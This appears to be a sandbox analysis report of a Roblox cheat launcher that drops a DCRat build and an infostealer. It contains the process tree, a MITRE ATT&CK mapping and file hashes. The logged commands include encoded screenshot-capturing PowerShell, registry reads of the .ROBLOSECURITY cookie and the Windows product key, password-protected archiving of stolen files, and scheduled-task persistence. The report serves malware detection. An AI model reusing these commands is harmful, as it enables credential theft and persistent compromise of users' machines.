yAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1nire1j\k1nire1j.cmdline"16⤵PID:5304
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\k1nire1j\CSC4FD38EEB3E774408A39043C98DDE533.TMP"17⤵PID:5012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:4084
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:2648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"14⤵PID:3568
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts15⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:5640
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:4484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"14⤵PID:5652
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts15⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:5368
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:5920
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"14⤵PID:5728
-
C:\Windows\system32\tasklist.exetasklist /FO LIST15⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:6132
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:1124
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:4976
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:3428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"14⤵PID:5912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"14⤵PID:1096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"14⤵PID:1504
-
C:\Windows\system32\getmac.exegetmac15⤵PID:1296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\aZ8XX.zip" *"14⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\aZ8XX.zip" *15⤵
- Executes dropped EXE
PID:1804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"14⤵PID:4444
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption15⤵
- Suspicious use of AdjustPrivilegeToken
PID:3704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"14⤵PID:3596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵PID:4300
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory15⤵PID:4044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"14⤵PID:4476
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid15⤵PID:5404
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"14⤵PID:1568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER15⤵
- Suspicious behavior: EnumeratesProcesses
PID:5244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"14⤵PID:4184
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name15⤵
- Detects videocard installed
PID:5984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"14⤵PID:4056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault15⤵
- Suspicious behavior: EnumeratesProcesses
PID:3168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""14⤵PID:3752
-
C:\Windows\system32\PING.EXEping localhost -n 315⤵
- Runs ping.exe
PID:5828 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"12⤵
- Blocklisted process makes network request
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"13⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=4028.1440.776500408270139430114⤵
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2776 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=125.0.2535.92 --initial-client-data=0x15c,0x160,0x164,0x138,0x16c,0x7ffed9054ef8,0x7ffed9054f04,0x7ffed9054f1015⤵PID:508
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1716,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1672 /prefetch:215⤵PID:5312
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=1872,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1996 /prefetch:315⤵PID:4780
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=1980,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:815⤵PID:5180
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3480,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:115⤵PID:5484
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2176,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:815⤵PID:5124
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=752,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:815⤵PID:1724
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4784,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=4620 /prefetch:815⤵PID:2212
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=4796,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=4824 /prefetch:815⤵PID:3924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\agentInto\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\agentInto\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\agentInto\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4132
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:5368
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3408
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Windows Photo Viewer\conhost.exeFilesize
4.0MB
MD56cf5f23f1c8ca3bc6342506baac300da
SHA118affb87f0e996d202f0be3b8109701120ea3995
SHA256f3ee0a31d29b515d2e0bf776507897ca3ef5605d0470adcc4163209ba78e3445
SHA51266830da8515a32f3cf03149f0b23398265cbad452be1e81bfbaa2fb553e607ab498b2e6d2af06d9ec840236c2fe7d964443ed4f2ab4d9e50bd07ecf1aa70335b
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-as.hybFilesize
703B
MD58961fdd3db036dd43002659a4e4a7365
SHA17b2fa321d50d5417e6c8d48145e86d15b7ff8321
SHA256c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe
SHA512531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hi.hybFilesize
687B
MD50807cf29fc4c5d7d87c1689eb2e0baaa
SHA1d0914fb069469d47a36d339ca70164253fccf022
SHA256f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42
SHA5125324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-nb.hybFilesize
141KB
MD5677edd1a17d50f0bd11783f58725d0e7
SHA198fedc5862c78f3b03daed1ff9efbe5e31c205ee
SHA256c2771fbb1bfff7db5e267dc7a4505a9675c6b98cfe7a8f7ae5686d7a5a2b3dd0
SHA512c368f6687fa8a2ef110fcb2b65df13f6a67feac7106014bd9ea9315f16e4d7f5cbc8b4a67ba2169c6909d49642d88ae2a0a9cd3f1eb889af326f29b379cfd3ff
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\manifest.jsonFilesize
179B
MD5273755bb7d5cc315c91f47cab6d88db9
SHA1c933c95cc07b91294c65016d76b5fa0fa25b323b
SHA2560e22719a850c49b3fba3f23f69c8ff785ce3dee233030ed1ad6e6563c75a9902
SHA5120e375846a5b10cc29b7846b20a5a9193ea55ff802f668336519ff275fb3d179d8d6654fe1d410764992b85a309a3e001cede2f4acdec697957eb71bdeb234bd8
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.fingerprintFilesize
66B
MD50c9218609241dbaa26eba66d5aaf08ab
SHA131f1437c07241e5f075268212c11a566ceb514ec
SHA25652493422ac4c18918dc91ef5c4d0e50c130ea3aa99915fa542b890a79ea94f2b
SHA5125d25a1fb8d9e902647673975f13d7ca11e1f00f3c19449973d6b466d333198768e777b8cae5becef5c66c9a0c0ef320a65116b5070c66e3b9844461bb0ffa47f
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.jsonFilesize
134B
MD558d3ca1189df439d0538a75912496bcf
SHA199af5b6a006a6929cc08744d1b54e3623fec2f36
SHA256a946db31a6a985bdb64ea9f403294b479571ca3c22215742bdc26ea1cf123437
SHA512afd7f140e89472d4827156ec1c48da488b0d06daaa737351c7bec6bc12edfc4443460c4ac169287350934ca66fb2f883347ed8084c62caf9f883a736243194a2
-
C:\Users\Admin\AppData\Local\Temp\Built.exeFilesize
24.0MB
MD568d3ea3afa53dedfd3593d140747b932
SHA1757ff4ea1105bdcc861c98872cb28f3a32b170e9
SHA25697e31ae693f118965c81672374dfa269f2b5c3c2b9502ac983f8b5817d5d0002
SHA512b72adb6eed395db98f9bd3452c82252807320ed682cd585714fa4d526b6644ea873a62914f5fed2989fcf85f7b2e9472e37c2e3bbfb92867a2747ccee8ef8048
-
C:\Users\Admin\AppData\Local\Temp\CheatLauncherV2.exeFilesize
11.4MB
MD5108590051fab4871af861b8b12ad1e96
SHA1172d10992c078145e1439e85869dcee89e95819b
SHA2567d11195746ed7866dce67ebe82dd5c9bdc6f3251528a9d40c22be61612f71d1a
SHA51227863d3991e490d69f199d8bf3ea521bee1cfe18336fcf64960c5fa16cd4ec7fc7e4a74f4795b9ffeed194326f6f28dc800569b0e6f7d2bb8647d64f37c2d544
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exeFilesize
4.3MB
MD52edb71dd3792b6f6a774edbf67bb78d2
SHA17a8cff8359caec23a66212118ce4edd1e239bfeb
SHA2569daadd6e7cbd889a2a05fa94d2876710542332a79782cec38c09e9079415b6ae
SHA512aa9bb70014a07b181960bd9ea1c1106f046f123f24a263c45ab58a461245e141a0ad3af7d7b17e0cc59675fe1934f62a735756d52d068474690828fe6b44719f
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrcFilesize
139B
MD5d0104f79f0b4f03bbcd3b287fa04cf8c
SHA154f9d7adf8943cb07f821435bb269eb4ba40ccc2
SHA256997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a
SHA512daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrcFilesize
43B
MD5c28b0fe9be6e306cc2ad30fe00e3db10
SHA1af79c81bd61c9a937fca18425dd84cdf8317c8b9
SHA2560694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641
SHA512e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9
-
